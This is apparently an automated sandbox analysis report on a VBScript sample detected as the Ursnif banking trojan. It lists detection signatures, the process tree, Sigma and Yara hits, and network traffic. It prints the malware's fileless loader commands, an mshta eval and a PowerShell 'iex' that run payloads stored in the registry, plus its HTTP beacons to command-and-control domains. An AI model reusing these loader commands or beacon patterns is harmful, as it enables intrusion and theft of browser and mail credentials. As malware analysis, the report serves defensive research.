Play interactive tour

Edit tour

Analysis Report JeSoTz0An7tn.vbs

Overview

General Information

Sample Name:	JeSoTz0An7tn.vbs
Analysis ID:	321727
MD5:	575ea6ce44ca6db627a5082e266dcfca
SHA1:	921f7bd07ed116f3ba0c2def03749926708ac8f0
SHA256:	f7cb6062bdf33969b60f5fa4ba49274128108aae01b5b8dbff05b4b21cea66ea
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Deletes itself after installation

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

WScript reads language and country specific registry keys (likely country aware script)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

wscript.exe (PID: 4156 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\JeSoTz0An7tn.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

iexplore.exe (PID: 6388 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6444 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6600 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6968 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:82958 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 6608 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5500 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6628 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1536 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES508E.tmp' 'c:\Users\user\AppData\Local\Temp\p4xjawzl\CSCF25F578263E4AA98A5ACFCF8CC63832.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 484 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\c2racwwn\c2racwwn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5FA2.tmp' 'c:\Users\user\AppData\Local\Temp\c2racwwn\CSC8F1415F2367845AF84D1583CADF7143D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3668 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

control.exe (PID: 1492 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 4832 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.278825876.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.414378391.0000000005CB0000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.278880644.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.278943853.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.290307818.00000000058EB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.656715294.000001FC1383E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.278998864.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.279058924.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.279111543.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.279035350.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.279086537.0000000005A68000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.348938504.0000000005CF0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 5500	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 9 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline', ProcessId: 6628

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5500

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\p4xjawzl\p4xjawzl.cmdline', ProcessId: 6628

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 1492, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4832

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\onerous.tar

Avira: detection malicious, Label: TR/Crypt.XDR.Gen

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 12%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\onerous.tar

ReversingLabs: Detection: 50%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\onerous.tar

Joe Sandbox ML: detected

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking:

Found Tor onion address

Show sources

Source: powershell.exe, 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp

String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /api1/zQt8WvwqX1ucd4e_/2BSjEwnwCh3l6nl/uRpMWVq6Na7DVvVqDQ/c_2F8RJYX/bwf8F3MzlXzQXVHyRWwx/arvl4jzmt4MjkOLeA5D/hFQALRzK_2FfnX1J_2B_2B/QVhfzXC95MQT_/2F5JxPkR/0hfcwScbYsxo4WDetMu7ETB/kC0bi1gC1M/Peufr7Q9aEqhXzY9P/IP_2BoMUFEki/3WBXS7Ps9gU/B0guoxmZ0c7HMP/MN7IPcCq62eYfghVtkrOj/cDqHZNRKwjs9dSDB/S_2B_0A_0DCG5Ou/hoVuqtcbmguh8Hg01X/wBH_2FHER/Tq885DE0KGS3yQbLseza/xevKBRy_2Beq5lp/lACGR HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/ZndIxL1Rb/5wthxjo8h6XlGXwhQjpI/qR4_2Bxy4qmCmpod_2F/aR_2Bq10kCEEmmsKL463nm/IwJnUBwMFW3IE/IWX2kgn2/AlRW6_2FwG8heSg8_2F45kx/d4CTG40DuC/sB_2BD_2BsM3jQ0t4/hyjobYI0rasE/sXzcAxdFd67/YKNQnrZrruVtZL/y9fsMRIhJ_2BBspvP_2FO/RHYAogT86Q7GBO8a/8pyYO5iimp3k3ij/LQMLc4JwFGySVUyYlf/Y3_2Fdd4T/rv7G_2ByjMoeYiU5c_0A/_0D1PNgf8iqzwUhfRFh/19iAB9EdF6LCz3fArW2WPs/VDtJz46818gnQ/eDClUEW1AGzlbdI/6d HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/3KeMhgiT8xV_/2FK897xWvJR/8iXi7QgKkQnFJA/vQvtuI7pl2axq2iQpRqfy/IcWdr95MWH_2FlIm/pxVwXYLRRjXX0iQ/Uu36CRnAWqyyANtvaC/GzBvnVm6z/2Vvse0Pv_2F2DgCjCiAr/HbSFwBUye9G83hlGQIE/ynlkRMDXeczvpYVDo2l1f2/u19mcvVVhmsQS/4qg7eRGS/y4iFh_2B2qVkDLa3nN1YMA_/2BF6h0vTAz/LS1BzJAVb8zBnnLnm/vKxwpRLQLhui/Ux_0A_0DFAv/2rNCEQzrqGRLrU/KP0aNmF_2FPI7PEUIWwdT/BT8ui2_2Bzid3re8/3_2BW_2BnNoX7CzUq5G/oI2 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/nN1Ol55DdZTF99NetjRWaAH/9IlAYH_2Bi/NJChWxmCySi4TCNdb/Hb2PMV9f9c1p/2JROzv82VEe/E5EE064uJn_2BN/5apynrqoBO2iUfsVr4ByT/GimjwbpQ_2BN0ESk/XFcgAwglRcD9XWW/i9wwZWDT3dc2fTMBWK/PmCwEjtPF/jcOKLZu2Kr6dC6y5yCqK/z4lWwCXRASbwMHnE8_2/F_2Bwn3gZ4jbDdhop6IMLA/VInxpv_2Fd5rb/qZil400K/ZBWMNFOBSvjT6i_2BS_0A_0/DcAMkhWaLG/_2F_2BmB9gSdFZbEM/3RTOybBlcMx_/2FWJEpANZJE7/DFY HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/a7X3wKrHBlCp0HYJPYF/jk9V6OkOof3C2RxlJ2_2Fs/jBqm5Ed5Au1Vf/h1anrt29/KsmpkCp_2F_2BFD_2FtezFN/RZDEry7Kqz/Wt5qRHzZA_2BmOlu4/KFMopUFfPYPj/xpsgjW2d3uR/5AaJI6t1vNy9Ny/vvWteODreeJH8A828HrjN/chdlkP8GqXv8ttX9/MIG_2BRH93knCfx/FHHCw0Q_2BdhIIZApq/bHbIsGhO6/VKb5IykC2rrBg6oz9ZT4/EJINWK2nI6i1Tk_2F3W/R_0A_0DvhtwXzfor9MIaPz/FncFikW4EM_2F/gQQoay3J9Z2Ql/YXe_2FRyh/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/4sKGcNWqFHVLKZ/2BTUgUaompfmLz2qEm5Tx/OfFGVs64GaPmABpi/ZxL5WlDeDM7x6hL/BCAh7voGMSUk50JM4D/95dysEGuf/8_2FLzWVldxgWdcK_2BS/cgiU1UY8ocTit7FNjj3/yZIMmxb8t97EcWPqxfbq9x/XAon_2Fklf9lH/UaIo5Tfo/segWplJOjJrpFm3wN5NNlmZ/JoENouc151/2TgqsBaQK3k6BgA4E/PfxzEf7mqqdI/Fz9ElsLTgix/zC7Cgey64u_0A_/0DDmG0Q1ZrBLICXpHTs79/K68kaHn_2B2VZwcW/kpiiM8xpuwmXYmB/_2BIh_2B9AOz7RozN2/QYOBBG HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/7gkQmt9ytyXiUUu/eKA3KxiWln9j2j10wD/wVPvUU48L/_2BiS_2Bb62v4aN_2F3V/75Fn32MNXkBomDExXol/3Pb8xO6WfnysvNA6s8ko8C/fkIKmEZq_2BvG/hyZi5ssg/pkfICryguuzMqzz0Acgij37/W6Qd84zkpW/daft2smXTJIdHoUZc/3s_2FvBVoMuz/PTXJ8XUF2iq/vIPUEqt_2BFkWq/SgvcxVBS96mCbA_2Bw_2B/OIGmgyiRvVjJm8I0/xdqEQ2vXnsTWUTA/BBEa1_0A_0DLxkfm7A/imaPnY7BH/K6T3oo6_2FTtR0c4LiJg/_2B57jESF6/9e165 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Nov 2020 15:11:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000023.00000000.378969278.0000000006300000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000023.00000002.652739698.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.363642262.0000000001980000.00000002.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/3KeMhgiT8xV_/2FK897xWvJR/8iXi7QgKkQnFJA/vQvtuI7pl2axq2iQpRqfy/IcWdr
Source: explorer.exe, 00000023.00000000.388373272.00000000088C3000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/3KeMhgiT8xV_/2FK897xWvJR/8iXi7QgKkQnFJA/vQvtuI7pl2axq2iQpRqfy/IcWdr95MWH
Source: explorer.exe, 00000023.00000003.559813956.00000000089AA000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/a7X3wKrHBlCp0HYJPYF/jk9V6OkOof3C2RxlJ2_2Fs/jBqm5Ed5Au1Vf/h1anrt29/KsmpkCp
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.378969278.0000000006300000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
